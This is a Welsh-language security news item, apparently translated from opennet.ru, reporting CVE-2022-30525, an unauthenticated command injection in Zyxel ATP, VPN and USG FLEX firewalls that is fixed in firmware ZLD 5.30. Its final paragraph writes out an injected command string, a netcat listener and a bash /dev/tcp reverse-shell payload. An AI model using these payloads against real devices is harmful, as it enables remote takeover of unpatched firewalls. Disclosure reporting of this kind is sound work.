Bregusrwydd mewn waliau tân Zyxel sy'n caniatáu gweithredu cod heb ddilysu

Mae bregusrwydd critigol (CVE-2022-30525) wedi'i nodi mewn dyfeisiau Zyxel o'r gyfres ATP, VPN ac USG FLEX, a gynlluniwyd i drefnu gweithrediad waliau tân, IDS a VPN mewn mentrau, sy'n caniatáu i ymosodwr allanol weithredu cod ar y dyfais heb hawliau defnyddiwr heb ddilysu. I gyflawni ymosodiad, rhaid i ymosodwr allu anfon ceisiadau i'r ddyfais gan ddefnyddio'r protocol HTTP/HTTPS. Mae Zyxel wedi trwsio'r bregusrwydd yn y diweddariad firmware ZLD 5.30. Yn ôl gwasanaeth Shodan, ar hyn o bryd mae 16213 o ddyfeisiau a allai fod yn agored i niwed ar y rhwydwaith byd-eang sy'n derbyn ceisiadau trwy HTTP / HTTPS.

Cyflawnir y gweithrediad trwy anfon gorchmynion a ddyluniwyd yn arbennig at y triniwr gwe /ztp/cgi-bin/handler, sy'n hygyrch heb ddilysiad. Mae'r broblem yn cael ei achosi gan ddiffyg glanhau paramedrau cais yn iawn wrth weithredu gorchmynion ar y system gan ddefnyddio'r alwad os.system a ddefnyddir yn y llyfrgell lib_wan_settings.py a'i weithredu wrth brosesu gweithrediad setWanPortSt.

Er enghraifft, gallai ymosodwr basio'r llinyn “; ping 192.168.1.210;" a fydd yn arwain at weithredu'r gorchymyn “ping 192.168.1.210” ar y system. I gael mynediad i'r gragen gorchymyn, gallwch redeg “nc -lvnp 1270” ar eich system, ac yna cychwyn cysylltiad gwrthdro trwy anfon cais i'r ddyfais gyda'r '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Ffynhonnell: opennet.ru

Ychwanegu sylw